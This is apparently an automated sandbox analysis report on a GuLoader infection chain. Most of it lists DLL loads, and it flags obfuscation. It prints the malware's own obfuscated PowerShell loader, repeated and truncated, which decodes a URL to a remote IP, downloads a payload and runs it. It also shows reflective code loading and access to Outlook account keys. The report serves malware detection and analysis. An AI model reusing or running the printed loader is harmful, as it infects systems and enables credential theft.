                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trom", "0")
                Yara detected GuLoader
                Source: Yara matchFile source: 0000000A.00000002.3365707907.0000000003B66000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2523450659.00000000098C6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2523348220.0000000008E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Trommesalsmaleri)$global:Journalnummeret = [System.Text.Encoding]::ASCII.GetString($Spuming)$global:Gennemsigtigt=$Journalnummeret.substring($Lysimeters,$Descantist115)<#beagler Mids
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((bunkevist $Camperingers $Premoral), (Enveloping @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hellebardists = [AppDomain]::CurrentDomain.GetAssemblies()$
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Konfedereret)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Peroxy, $false).DefineType($Telecourse, $Aca
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Trommesalsmaleri)$global:Journalnummeret = [System.Text.Encoding]::ASCII.GetString($Spuming)$global:Gennemsigtigt=$Journalnummeret.substring($Lysimeters,$Descantist115)<#beagler Mids
                Obfuscated command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 